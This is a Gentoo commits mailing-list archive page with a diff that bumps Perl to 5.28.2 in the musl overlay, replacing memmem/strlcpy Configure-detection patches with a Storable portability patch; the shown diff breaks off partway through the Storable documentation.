Get Gentoo!
gentoo.org sites
gentoo.org Wiki Bugs Forums Packages
Planet Archives Sources
Infra Status

Gentoo Archives: gentoo-commits

From: Jory Pratt <anarchy@g.o>
To: gentoo-commits@l.g.o
Subject: [gentoo-commits] proj/musl:master commit in: dev-lang/perl/files/5.28/, dev-lang/perl/
Date: Sat, 20 Apr 2019 23:26:27
Message-Id: 1555718012.258898fc55bacccafb9fd401bd1cff96178aa228.anarchy@gentoo
1 commit: 258898fc55bacccafb9fd401bd1cff96178aa228
2 Author: Jory Pratt <anarchy <AT> gentoo <DOT> org>
3 AuthorDate: Fri Apr 19 23:53:32 2019 +0000
4 Commit: Jory Pratt <anarchy <AT> gentoo <DOT> org>
5 CommitDate: Fri Apr 19 23:53:32 2019 +0000
6 URL: https://gitweb.gentoo.org/proj/musl.git/commit/?id=258898fc
7
8 dev-lang/perl: bump to 5.28.2 with portability fixes
9
10 Package-Manager: Portage-2.3.64, Repoman-2.3.12
11 Signed-off-by: Jory Pratt <anarchy <AT> gentoo.org>
12
13 dev-lang/perl/Manifest | 4 +-
14 dev-lang/perl/files/5.28/perl-5.28.1-part1.patch | 75 --
15 dev-lang/perl/files/5.28/perl-5.28.1-part2.patch | 27 -
16 dev-lang/perl/files/5.28/perl-5.28.1-part3.patch | 88 --
17 dev-lang/perl/files/5.28/perl-5.28.1-part4.patch | 103 ---
18 dev-lang/perl/files/5.28/perl-5.28.1-part5.patch | 35 -
19 .../perl/files/5.28/perl-5.28.2-portability.patch | 976 +++++++++++++++++++++
20 .../{perl-5.28.1.ebuild => perl-5.28.2.ebuild} | 23 +-
21 8 files changed, 991 insertions(+), 340 deletions(-)
22
23 diff --git a/dev-lang/perl/Manifest b/dev-lang/perl/Manifest
24 index 2cf2ef2..9c51b06 100644
25 --- a/dev-lang/perl/Manifest
26 +++ b/dev-lang/perl/Manifest
27 @@ -1,6 +1,6 @@
28 DIST perl-5.26.2-patches-1.tar.xz 17100 BLAKE2B 681239e438945285e006ee1d1e2a9eb888fc9b425e6fbd4822e65e1fe1ced2216de76485b9792d3fee28783a588c09e1d34c294ef43d81055c4566af37fe9b6c SHA512 2a274150d2dba406c6efb67ec236f67032a51ff1788b30ea556e74b2f02fab68f5029ebd4b9d4daeb16b3a63fa7aa1744d323bf637a9d21946f19f33b69da245
29 DIST perl-5.26.3.tar.xz 11957032 BLAKE2B 3cd5332a0bede16608b1626b0b9903d71105784411c7acf2fd8c0e7637a2ab5049e650bdaba574584ed51a70cc21dfbee5557963717d52c4af9c8bd8e8ef80a1 SHA512 1126ead4f9cc313548e875b6dc9cd1f56f6fef4406f3fd1c108c5cad0db92c8cd0f9bde5b82d78d8f2bd67709c438e87dd45f26b98f327ba31b05b39acc3b299
30 -DIST perl-5.28.0-patches-1.tar.xz 17128 BLAKE2B f16843d9ecf27fa7d42dd59e1591d618ba9ad6b14f4e56bab4019af043eb79559cc7dbc4a1b1e580c18b7ba0b5d71c4da3e3f94955889629a655e7028492a066 SHA512 e05a492ba045ac71d20393099815bed8e4f491bed79a352e83537561eb256d4f672e0125c5cca9e45150c01d3ad463a070a49e845b3c17806d9f77a872d0352a
31 -DIST perl-5.28.1.tar.xz 12372080 BLAKE2B cb487edae4707277995ba098e281efe00a38d671db5e5b08161b202c0fe3136a3e92f04ca3a810bbd5fca9fe5b950376716bcbdd5417bd4042a0ef6c6eef57df SHA512 6d18e9684c3a15bea2ccd28f116d1829c3acd5547551ee3539f0060c0d1a75246dfe570dfb9d5f00625a994a0afb0cbd6a5a5f9a407fef75a421e7dbc6491b43
32 +DIST perl-5.28.2-patches-2.tar.xz 17332 BLAKE2B 74977d4b08e891225a3e0408473df048f6999a1a5044cb68dd205c3a95d5dcceafdaf59c277fd0a0853d5e818c2011434a88aee095cdfcb8ddc393e3a95f93c2 SHA512 b095f7966b8f09f64a6d7e425de91457ecdfddf7d2e73c5ab93632babcd37d0ab74175139484ed019aac09bc4c17ddce38eb75cebc3a80e4d47bbf7b15624c18
33 +DIST perl-5.28.2.tar.xz 12374448 BLAKE2B 82a49fcf3c29ff7241fae7ffaa1bf9f99d8cbfa6d00d5fd9ff7c3c23a461287322e12acba318c8de8507092e33b05549142bc5194bdb4b516994c9cdc0cb3f92 SHA512 0f2e4f7cb5d8cf6e00054b3842907e29b6c85902d97fb881d5bea65edbc875fef4e15e064561fac7c8db4939586576dd76a225026c7cca9624261c887b1fdb08
34 DIST perl-cross-1.1.9.tar.gz 102939 BLAKE2B 438ea75a14c4d60fdf3cb2f3671c736d229a83af210ba4fe6e79b989c6c4b45500d0221ec65bc71e1d43d234ec1daa20b3a19be6ceb01e638810900dbe3664a7 SHA512 002441012bd31f1ea71341707d91f89b76266c187c9d28f947ed5eddbcc6e3155e8dfd4b1814331561c3557764fea25bf6a938f08bcd4adfb5895361ad5a269a
35 DIST perl-cross-1.2.2.tar.gz 106073 BLAKE2B c4eaf5d60dd0ac88a9653cea399f5583a699d35f94a69a36ef9d3cde0017901ff68029f12a3af6e0fd34d46accbb6be009167fadb790da8065f6b85115f1c9b8 SHA512 49dc190018b891daac68a954e2a9bab6294920f02b585c530dcc47af03e8ab51d402455202d45121fa206ee743986ddd50323658c179d2c15cb6af7a2eb0958c
36
37 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch
38 deleted file mode 100644
39 index 5ac0e85..0000000
40 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch
41 +++ /dev/null
42 @@ -1,75 +0,0 @@
43 -From ca152fd8207cf53816b1407d5f54f6ea160a3ef8 Mon Sep 17 00:00:00 2001
44 -From: Andy Dougherty <doughera@×××××××××.edu>
45 -Date: Tue, 22 Jan 2019 14:17:05 -0500
46 -Subject: [PATCH] Improve Configure detection of memmem() [perl #133760].
47 -
48 -Linux systems have memmem, but the header prototype is only visible if
49 -the C library, but didn't check if the correct prototype is available.
50 -This patch compiles & runs a test program that will fail if the prototype
51 -is needed but not available.
52 -
53 -This does not completely close [perl #133760]. The tests for strlcat()
54 -and strlcpy() may also need to be similarly changed. Also, this patch
55 -does not change whether _GNU_SOURCE is defined or not. Presumably that
56 -would be done separately in the linux hints file.
57 ----
58 - Configure | 43 +++++++++++++++++++++++++++++++++++++++++--
59 - 1 file changed, 41 insertions(+), 2 deletions(-)
60 -
61 -diff --git a/Configure b/Configure
62 -index 6041b0bbb0..a83cbdf2f8 100755
63 ---- a/Configure
64 -+++ b/Configure
65 -@@ -16155,8 +16155,47 @@ set mbtowc d_mbtowc
66 - eval $inlibc
67 -
68 - : see if memmem exists
69 --set memmem d_memmem
70 --eval $inlibc
71 -+echo " "
72 -+echo "Checking if you have a working memmem()" >&4
73 -+$cat >try.c <<EOCP
74 -+#$d_gnulibc HAS_GNULIBC /**/
75 -+#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)
76 -+# define _GNU_SOURCE
77 -+#endif
78 -+#include <stdio.h>
79 -+#include <stdlib.h>
80 -+#include <stddef.h>
81 -+#include <string.h>
82 -+int main(int argc, char **argv)
83 -+{
84 -+ char *big = "abcdefghiabcdefghi";
85 -+ char *little = "def";
86 -+ char *rtn;
87 -+ ptrdiff_t diff;
88 -+ rtn = (char *) memmem(big, strlen(big), little, strlen(little));
89 -+ diff = rtn - big;
90 -+ exit(diff == 3 ? EXIT_SUCCESS : EXIT_FAILURE);
91 -+}
92 -+EOCP
93 -+set try
94 -+if eval $compile; then
95 -+ `$run ./try`
96 -+ rc=$?
97 -+ case "$rc" in
98 -+ 0) echo "Yes, you do." >&4
99 -+ val="$define"
100 -+ ;;
101 -+ *) echo "Well, you have memmem, but it isn't working." >&4
102 -+ val="$undef"
103 -+ ;;
104 -+ esac
105 -+else
106 -+ echo "No, you do not." >&4
107 -+ val="$undef"
108 -+fi
109 -+set d_memmem
110 -+eval $setvar
111 -+$rm_try
112 -
113 - : see if memrchr exists
114 - set memrchr d_memrchr
115 ---
116 -2.15.1-424-g9478a660812
117 -
118
119 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch
120 deleted file mode 100644
121 index c2c49b6..0000000
122 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch
123 +++ /dev/null
124 @@ -1,27 +0,0 @@
125 -From 63c1fa6a98bc60234a21de83dd191cd581a5d073 Mon Sep 17 00:00:00 2001
126 -From: Andy Dougherty <doughera@×××××××××.edu>
127 -Date: Wed, 23 Jan 2019 21:12:29 -0500
128 -Subject: [PATCH] Add ability to include literal text in the prototype check.
129 -
130 -This is the same technique as in the metaconfig unit Protochk.U.
131 -See that unit for more usage information. It is a bit clunky,
132 -but does work.
133 ----
134 - Configure | 1 +
135 - 1 file changed, 1 insertion(+)
136 -
137 -diff --git a/Configure b/Configure
138 -index a83cbdf2f8..179545727e 100755
139 ---- a/Configure
140 -+++ b/Configure
141 -@@ -10739,6 +10739,7 @@ hasproto='varname=$1; func=$2; shift; shift;
142 - while $test $# -ge 2; do
143 - case "$1" in
144 - $define) echo "#include <$2>";;
145 -+ literal) echo "$2" ;;
146 - esac ;
147 - shift 2;
148 - done > try.c;
149 ---
150 -2.15.1-424-g9478a660812
151 -
152
153 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch
154 deleted file mode 100644
155 index 3e31c1d..0000000
156 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch
157 +++ /dev/null
158 @@ -1,88 +0,0 @@
159 -From f8d82a1010426d0eb49c33cb903413b882c85c3e Mon Sep 17 00:00:00 2001
160 -From: Andy Dougherty <doughera@×××××××××.edu>
161 -Date: Wed, 23 Jan 2019 21:39:39 -0500
162 -Subject: [PATCH] Another attempt to improve Configure detection of memmem()
163 - [perl #133760].
164 -
165 -This updates commit ca152fd8207cf53816b1407d5f54f6ea160a3ef8.
166 -Linux systems have memmem, but the prototype in <string.h> is only
167 -visible if __GNU_SOURCE is defined. This version tests for both the
168 -prototype in <string.h> and the symbol in libc. (Thanks to Tony C. for
169 -the suggestion.) (For BSD systems, no extra define is needed.)
170 ----
171 - Configure | 58 ++++++++++++++++++----------------------------------------
172 - 1 file changed, 18 insertions(+), 40 deletions(-)
173 -
174 -diff --git a/Configure b/Configure
175 -index 179545727e..ad17948a2c 100755
176 ---- a/Configure
177 -+++ b/Configure
178 -@@ -16156,47 +16156,25 @@ set mbtowc d_mbtowc
179 - eval $inlibc
180 -
181 - : see if memmem exists
182 -+: We need both a prototype in string.h and the symbol in libc.
183 - echo " "
184 --echo "Checking if you have a working memmem()" >&4
185 --$cat >try.c <<EOCP
186 --#$d_gnulibc HAS_GNULIBC /**/
187 --#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)
188 --# define _GNU_SOURCE
189 --#endif
190 --#include <stdio.h>
191 --#include <stdlib.h>
192 --#include <stddef.h>
193 --#include <string.h>
194 --int main(int argc, char **argv)
195 --{
196 -- char *big = "abcdefghiabcdefghi";
197 -- char *little = "def";
198 -- char *rtn;
199 -- ptrdiff_t diff;
200 -- rtn = (char *) memmem(big, strlen(big), little, strlen(little));
201 -- diff = rtn - big;
202 -- exit(diff == 3 ? EXIT_SUCCESS : EXIT_FAILURE);
203 --}
204 --EOCP
205 --set try
206 --if eval $compile; then
207 -- `$run ./try`
208 -- rc=$?
209 -- case "$rc" in
210 -- 0) echo "Yes, you do." >&4
211 -- val="$define"
212 -- ;;
213 -- *) echo "Well, you have memmem, but it isn't working." >&4
214 -- val="$undef"
215 -- ;;
216 -- esac
217 --else
218 -- echo "No, you do not." >&4
219 -- val="$undef"
220 --fi
221 --set d_memmem
222 --eval $setvar
223 --$rm_try
224 -+d_memmem_proto=''
225 -+xx1="#$d_gnulibc HAS_GNULIBC"
226 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
227 -+xx3='# define _GNU_SOURCE'
228 -+xx4='#endif'
229 -+set d_memmem_proto memmem literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
230 -+eval $hasproto
231 -+case "$d_memmem_proto" in
232 -+ define) # see if memmem exists
233 -+ set memmem d_memmem
234 -+ eval $inlibc
235 -+ ;;
236 -+ *) val=$undef
237 -+ set d_memmem
238 -+ eval $setvar
239 -+ ;;
240 -+esac
241 -
242 - : see if memrchr exists
243 - set memrchr d_memrchr
244 ---
245 -2.15.1-424-g9478a660812
246 -
247
248 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch
249 deleted file mode 100644
250 index 17f62ab..0000000
251 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch
252 +++ /dev/null
253 @@ -1,103 +0,0 @@
254 -From ba73a4cb8f472480a2d630613d1e9e1172d518d3 Mon Sep 17 00:00:00 2001
255 -From: Andy Dougherty <doughera@×××××××××.edu>
256 -Date: Thu, 31 Jan 2019 13:04:32 -0500
257 -Subject: [PATCH] Improve detection of memrchr, strlcat, and strlcpy.
258 -
259 -This is continuation of commit f8d82a1010 addressing [perl #133760].
260 -Linux systems using the musl C library have memmem, memrchr, strlcat, and
261 -strlcpy, but the prototypes are only visible if _GNU_SOURCE is defined.
262 -This patch makes Configure test both whether the prototype is visible
263 -and whether the C symbol is visible.
264 -
265 -Still to be done is automatically adding _GNU_SOURCE if the musl library
266 -is being used -- probably in hints/linux.sh.
267 ----
268 - Configure | 63 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
269 - 1 file changed, 57 insertions(+), 6 deletions(-)
270 -
271 -diff --git a/Configure b/Configure
272 -index ad17948a2c..b91d1565b1 100755
273 ---- a/Configure
274 -+++ b/Configure
275 -@@ -16177,8 +16177,25 @@ case "$d_memmem_proto" in
276 - esac
277 -
278 - : see if memrchr exists
279 --set memrchr d_memrchr
280 --eval $inlibc
281 -+: We need both a prototype in string.h and the symbol in libc.
282 -+echo " "
283 -+d_memrchr_proto=''
284 -+xx1="#$d_gnulibc HAS_GNULIBC"
285 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
286 -+xx3='# define _GNU_SOURCE'
287 -+xx4='#endif'
288 -+set d_memrchr_proto memrchr literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
289 -+eval $hasproto
290 -+case "$d_memrchr_proto" in
291 -+ define) # see if memrchr exists
292 -+ set memrchr d_memrchr
293 -+ eval $inlibc
294 -+ ;;
295 -+ *) val=$undef
296 -+ set d_memrchr
297 -+ eval $setvar
298 -+ ;;
299 -+esac
300 -
301 - : see if mkdir exists
302 - set mkdir d_mkdir
303 -@@ -18787,12 +18804,46 @@ set strftime d_strftime
304 - eval $inlibc
305 -
306 - : see if strlcat exists
307 --set strlcat d_strlcat
308 --eval $inlibc
309 -+: We need both a prototype in string.h and the symbol in libc.
310 -+echo " "
311 -+d_strlcat_proto=''
312 -+xx1="#$d_gnulibc HAS_GNULIBC"
313 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
314 -+xx3='# define _GNU_SOURCE'
315 -+xx4='#endif'
316 -+set d_strlcat_proto strlcat literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
317 -+eval $hasproto
318 -+case "$d_strlcat_proto" in
319 -+ define) # see if strlcat exists
320 -+ set strlcat d_strlcat
321 -+ eval $inlibc
322 -+ ;;
323 -+ *) val=$undef
324 -+ set d_strlcat
325 -+ eval $setvar
326 -+ ;;
327 -+esac
328 -
329 - : see if strlcpy exists
330 --set strlcpy d_strlcpy
331 --eval $inlibc
332 -+: We need both a prototype in string.h and the symbol in libc.
333 -+echo " "
334 -+d_strlcpy_proto=''
335 -+xx1="#$d_gnulibc HAS_GNULIBC"
336 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
337 -+xx3='# define _GNU_SOURCE'
338 -+xx4='#endif'
339 -+set d_strlcpy_proto strlcpy literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
340 -+eval $hasproto
341 -+case "$d_strlcpy_proto" in
342 -+ define) # see if strlcpy exists
343 -+ set strlcpy d_strlcpy
344 -+ eval $inlibc
345 -+ ;;
346 -+ *) val=$undef
347 -+ set d_strlcpy
348 -+ eval $setvar
349 -+ ;;
350 -+esac
351 -
352 - : see if strnlen exists
353 - set strnlen d_strnlen
354 ---
355 -2.15.1-424-g9478a660812
356 -
357
358 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch
359 deleted file mode 100644
360 index e9cac65..0000000
361 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch
362 +++ /dev/null
363 @@ -1,35 +0,0 @@
364 -From 04db542212fdad3a62f13afe741c99028f4bf799 Mon Sep 17 00:00:00 2001
365 -From: Andy Dougherty <doughera@×××××××××.edu>
366 -Date: Thu, 31 Jan 2019 14:05:41 -0500
367 -Subject: [PATCH] Define _GNU_SOURCE if using the musl libc on linux.
368 -
369 -Together with prior commits ba73a4cb8f, f8d82a1010, and 63c1fa6a98,
370 -this should close [perl #133760].
371 ----
372 - hints/linux.sh | 10 ++++++++++
373 - 1 file changed, 10 insertions(+)
374 -
375 -diff --git a/hints/linux.sh b/hints/linux.sh
376 -index 3f38ea07f1..a985a8ee1b 100644
377 ---- a/hints/linux.sh
378 -+++ b/hints/linux.sh
379 -@@ -178,6 +178,16 @@ case "$plibpth" in
380 - ;;
381 - esac
382 -
383 -+# For the musl libc, perl should #define _GNU_SOURCE. Otherwise, some
384 -+# available functions, like memem, won't be used. See the discussion in
385 -+# [perl #133760]. musl doesn't offer an easy way to identify it, but,
386 -+# at least on alpine linux, the ldd --version output contains the
387 -+# string 'musl.'
388 -+case `ldd --version 2>&1` in
389 -+ musl*) ccflags="$ccflags -D_GNU_SOURCE" ;;
390 -+ *) ;;
391 -+esac
392 -+
393 - # libquadmath is sometimes installed as gcc internal library,
394 - # so contrary to our usual policy of *not* looking at gcc internal
395 - # directories we now *do* look at them, in case they contain
396 ---
397 -2.15.1-424-g9478a660812
398 -
399
400 diff --git a/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch b/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch
401 new file mode 100644
402 index 0000000..38d4027
403 --- /dev/null
404 +++ b/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch
405 @@ -0,0 +1,976 @@
406 +From 841cea7b099fc12274991dda349a86b1ce8059da Mon Sep 17 00:00:00 2001
407 +From: Andreas K. Hüttel <dilfridge@g.o>
408 +Date: Fri, 19 Apr 2019 21:16:33 +0000
409 +Subject: [PATCH] Fix Storable for non glibc systems
410 +
411 +---
412 + MANIFEST | 1 -
413 + Makefile.SH | 25 ---
414 + Porting/Maintainers.pl | 4 +-
415 + dist/Storable/ChangeLog | 30 ++++
416 + dist/Storable/Makefile.PL | 46 +-----
417 + dist/Storable/__Storable__.pm | 35 ++--
418 + dist/Storable/stacksize | 77 ++-------
419 + dist/Storable/t/CVE-2015-1592.inc | 261 ------------------------------
420 + dist/Storable/t/CVE-2015-1592.t | 25 ++-
421 + dist/Storable/t/dclone.t | 2 +
422 + dist/Storable/t/recurse.t | 4 +-
423 + dist/Storable/t/threads.t | 4 +
424 + mkppport.lst | 1 +
425 + win32/GNUmakefile | 12 +-
426 + win32/Makefile | 10 +-
427 + win32/makefile.mk | 15 +-
428 + 16 files changed, 103 insertions(+), 449 deletions(-)
429 + delete mode 100644 dist/Storable/t/CVE-2015-1592.inc
430 +
431 +diff --git a/MANIFEST b/MANIFEST
432 +index a6b5fe5..0f07fec 100644
433 +--- a/MANIFEST
434 ++++ b/MANIFEST
435 +@@ -3716,7 +3716,6 @@ dist/Storable/t/code.t See if Storable works
436 + dist/Storable/t/compat01.t See if Storable works
437 + dist/Storable/t/compat06.t See if Storable works
438 + dist/Storable/t/croak.t See if Storable works
439 +-dist/Storable/t/CVE-2015-1592.inc See if Storable works
440 + dist/Storable/t/CVE-2015-1592.t See if Storable works
441 + dist/Storable/t/dclone.t See if Storable works
442 + dist/Storable/t/destroy.t Test Storable in global destructon
443 +diff --git a/Makefile.SH b/Makefile.SH
444 +index 61970d4..7440fc2 100755
445 +--- a/Makefile.SH
446 ++++ b/Makefile.SH
447 +@@ -189,15 +189,11 @@ esac
448 +
449 + : is Cwd static or dynamic
450 + static_cwd='define'
451 +-storable_limit_dep=''
452 +-storable_type=''
453 + list_util_dep='$(PERL_EXE)'
454 + for f in $dynamic_ext; do
455 + case $f in
456 + Cwd) static_cwd='undef' ;;
457 + List/Util) list_util_dep=lib/auto/List/Util/Util.$dlext ;;
458 +- Storable) storable_limit_dep=lib/auto/Storable/Storable.$dlext
459 +- storable_type='dynamic' ;;
460 + esac
461 + done
462 +
463 +@@ -234,7 +230,6 @@ for f in $static_ext; do
464 + $this_target: lib/auto/List/Util/Util\$(LIB_EXT)" ;;
465 + Unicode/Normalize) extra_dep="$extra_dep
466 + $this_target: uni.data" ;;
467 +- Storable) storable_type='static' ;;
468 + esac
469 + done
470 +
471 +@@ -1201,26 +1196,6 @@ no_install no-install: install-notify
472 + install: install-all
473 + !NO!SUBS!
474 +
475 +-if test "$storable_type" != "" ; then
476 +-
477 +-case "$static_cwd" in
478 +-undef) storable_limit_dep="$storable_limit_dep lib/auto/Cwd/Cwd.$dlext" ;;
479 +-esac
480 +-
481 +-$spitshell >>$Makefile <<EOT
482 +-
483 +-dist/Storable/lib/Storable/Limit.pm : \$(PERL_EXE) dist/Storable/stacksize $storable_limit_dep
484 +- cd dist/Storable ; \$(LDLIBPTH) \$(MAKE) lib/Storable/Limit.pm
485 +-
486 +-lib/Storable/Limit.pm : dist/Storable/lib/Storable/Limit.pm
487 +- test -d lib/Storable || mkdir lib/Storable
488 +- cp dist/Storable/lib/Storable/Limit.pm lib/Storable/Limit.pm
489 +-EOT
490 +-
491 +-common_build_deps="$common_build_deps lib/Storable/Limit.pm"
492 +-
493 +-fi
494 +-
495 + for name in all notify silent strip verbose; do
496 + flags="--$name";
497 + flags=`echo $flags | sed -e 's/--all//'`
498 +diff --git a/Porting/Maintainers.pl b/Porting/Maintainers.pl
499 +index 4f039f7..64b56a5 100755
500 +--- a/Porting/Maintainers.pl
501 ++++ b/Porting/Maintainers.pl
502 +@@ -351,7 +351,7 @@ use File::Glob qw(:case);
503 + 'EXCLUDED' => [
504 + 'PPPort.pm', # we use PPPort_pm.PL instead
505 + ],
506 +- 'CUSTOMIZED' => [ qw[ parts/embed.fnc ] ],
507 ++ 'CUSTOMIZED' => [ qw[ parts/embed.fnc ] ],
508 + },
509 +
510 + 'Devel::SelfStubber' => {
511 +@@ -1010,7 +1010,7 @@ use File::Glob qw(:case);
512 + },
513 +
514 + 'Storable' => {
515 +- 'DISTRIBUTION' => 'AMS/Storable-2.51.tar.gz',
516 ++ 'DISTRIBUTION' => 'XSAWYERX/Storable-3.11.tar.gz',
517 + 'FILES' => q[dist/Storable],
518 + 'EXCLUDED' => [
519 + qr{^t/compat/},
520 +diff --git a/dist/Storable/ChangeLog b/dist/Storable/ChangeLog
521 +index 3f3076a..5e63ea6 100644
522 +--- a/dist/Storable/ChangeLog
523 ++++ b/dist/Storable/ChangeLog
524 +@@ -1,3 +1,33 @@
525 ++unreleased
526 ++ version 3.14
527 ++ * (perl #133708) don't build-time probe for stack limits at all
528 ++
529 ++unreleased
530 ++ version 3.12
531 ++ * (perl #133411) don't probe for stack limits with -Dusecrosscompile
532 ++
533 ++2018-04-27 20:40:00 xsawyerx
534 ++ version 3.11
535 ++ * Fix Strawberry Perl build failures.
536 ++
537 ++2018-04-21 22:00:00 xsawyerx
538 ++ Version 3.10
539 ++ * Fix binary artifacts from distribution.
540 ++
541 ++2018-04-21 16:49:00 xsawyerx
542 ++ Version 3.09
543 ++ * Fix "provides" in metadata (META.yml/META.json) to use the Storable
544 ++ template instead of a small other file (which also didn't exist).
545 ++
546 ++2018-04-21 11:23:00 xsawyerx
547 ++ Version 3.08
548 ++ * (perl #132849) try to disable core files when deliberatly segfaulting.
549 ++ * (perl #127743) don't probe Storable limits so much.
550 ++ * (perl #132893) don't probe for Storable recursion limits on old Win32.
551 ++ * (perl #132870) workaround VC2017 compiler bug.
552 ++ * (perl #127743) re-work for debugging builds with MSVC.
553 ++ * (perl #133039) dont build a Storable.so/.dll with a static perl build.
554 ++
555 + 2018-02-07 15:08:00 tonyc
556 + Version 3.06
557 +
558 +diff --git a/dist/Storable/Makefile.PL b/dist/Storable/Makefile.PL
559 +index 092bab4..4a39125 100644
560 +--- a/dist/Storable/Makefile.PL
561 ++++ b/dist/Storable/Makefile.PL
562 +@@ -7,21 +7,18 @@
563 + #
564 +
565 + use strict;
566 +-use ExtUtils::MakeMaker;
567 ++use warnings;
568 ++use ExtUtils::MakeMaker 6.31;
569 + use Config;
570 + use File::Copy qw(move copy);
571 + use File::Spec;
572 +
573 +-unlink "lib/Storable/Limit.pm";
574 +-
575 + my $pm = { 'Storable.pm' => '$(INST_ARCHLIB)/Storable.pm' };
576 +-unless ($ENV{PERL_CORE}) {
577 +- # the core Makefile takes care of this for core builds
578 +- $pm->{"lib/Storable/Limit.pm"} = '$(INST_ARCHLIB)/Storable/Limit.pm';
579 +-}
580 +
581 + WriteMakefile(
582 + NAME => 'Storable',
583 ++ AUTHOR => 'Perl 5 Porters',
584 ++ LICENSE => 'perl',
585 + DISTNAME => "Storable",
586 + # We now ship this in t/
587 + # PREREQ_PM => { 'Test::More' => '0.41' },
588 +@@ -36,7 +33,7 @@ WriteMakefile(
589 + { bugtracker => 'http://rt.perl.org/perlbug/' },
590 + provides => {
591 + 'Storable' => {
592 +- file => 'Storable_pm.PL',
593 ++ file => '__Storable__.pm',
594 + version => MM->parse_version('__Storable__.pm'),
595 + },
596 + },
597 +@@ -81,28 +78,7 @@ sub xlinkext {
598 + }
599 +
600 + sub depend {
601 +- my $extra_deps = "";
602 +- my $options = "";
603 +- if ($ENV{PERL_CORE}) {
604 +- $options = "--core";
605 +- }
606 +- else {
607 +- # blib.pm needs arch/lib
608 +- $extra_deps = ' Storable.pm';
609 +- }
610 +- my $whichperl;
611 +- if ($Config::Config{usecrosscompile}) {
612 +- $whichperl = '$(PERLRUN)';
613 +- }
614 +- else {
615 +- $whichperl = '$(FULLPERLRUNINST)';
616 +- }
617 +- my $linktype = uc($_[0]->{LINKTYPE});
618 +- my $limit_pm = File::Spec->catfile('lib', 'Storable', 'Limit.pm');
619 + "
620 +-$limit_pm : stacksize \$(INST_$linktype)$extra_deps
621 +- \$(MKPATH) \$(INST_LIB)
622 +- $whichperl stacksize $options
623 +
624 + release : dist
625 + git tag \$(VERSION)
626 +@@ -112,18 +88,6 @@ release : dist
627 + "
628 + }
629 +
630 +-sub test {
631 +- my ($self, %attr) = @_;
632 +-
633 +- my $out = $self->SUPER::test(%attr);
634 +-
635 +- if ($ENV{PERL_CORE}) {
636 +- $out =~ s!^(test(?:db)?_(?:static|dynamic)\b.*)!$1 lib/Storable/Limit.pm!gm;
637 +- }
638 +-
639 +- $out;
640 +-}
641 +-
642 + sub postamble {
643 + '
644 + all :: Storable.pm
645 +diff --git a/dist/Storable/__Storable__.pm b/dist/Storable/__Storable__.pm
646 +index e77b240..812675a 100644
647 +--- a/dist/Storable/__Storable__.pm
648 ++++ b/dist/Storable/__Storable__.pm
649 +@@ -27,18 +27,18 @@ our @EXPORT_OK = qw(
650 +
651 + our ($canonical, $forgive_me);
652 +
653 +-our $VERSION = '3.08_01';
654 ++our $VERSION = '3.14';
655 +
656 + our $recursion_limit;
657 + our $recursion_limit_hash;
658 +
659 +-do "Storable/Limit.pm";
660 +-
661 + $recursion_limit = 512
662 + unless defined $recursion_limit;
663 + $recursion_limit_hash = 256
664 + unless defined $recursion_limit_hash;
665 +
666 ++use Carp;
667 ++
668 + BEGIN {
669 + if (eval {
670 + local $SIG{__DIE__};
671 +@@ -54,16 +54,23 @@ BEGIN {
672 + # provide a fallback implementation.
673 + #
674 + unless ($Storable::{logcroak} && *{$Storable::{logcroak}}{CODE}) {
675 +- require Carp;
676 ++ *logcroak = \&Carp::croak;
677 ++ }
678 ++ else {
679 ++ # Log::Agent's logcroak always adds a newline to the error it is
680 ++ # given. This breaks refs getting thrown. We can just discard what
681 ++ # it throws (but keep whatever logging it does) and throw the original
682 ++ # args.
683 ++ no warnings 'redefine';
684 ++ my $logcroak = \&logcroak;
685 + *logcroak = sub {
686 +- Carp::croak(@_);
687 ++ my @args = @_;
688 ++ eval { &$logcroak };
689 ++ Carp::croak(@args);
690 + };
691 + }
692 + unless ($Storable::{logcarp} && *{$Storable::{logcarp}}{CODE}) {
693 +- require Carp;
694 +- *logcarp = sub {
695 +- Carp::carp(@_);
696 +- };
697 ++ *logcarp = \&Carp::carp;
698 + }
699 + }
700 +
701 +@@ -941,13 +948,13 @@ There are a few things you need to know, however:
702 +
703 + =item *
704 +
705 +-Since Storable 3.05 we probe for the stack recursion limit for references,
706 ++From Storable 3.05 to 3.13 we probed for the stack recursion limit for references,
707 + arrays and hashes to a maximal depth of ~1200-35000, otherwise we might
708 + fall into a stack-overflow. On JSON::XS this limit is 512 btw. With
709 + references not immediately referencing each other there's no such
710 + limit yet, so you might fall into such a stack-overflow segfault.
711 +
712 +-This probing and the checks performed have some limitations:
713 ++This probing and the checks we performed have some limitations:
714 +
715 + =over
716 +
717 +@@ -955,7 +962,9 @@ This probing and the checks performed have some limitations:
718 +
719 + the stack size at build time might be different at run time, eg. the
720 + stack size may have been modified with ulimit(1). If it's larger at
721 +-run time Storable may fail the freeze() or thaw() unnecessarily.
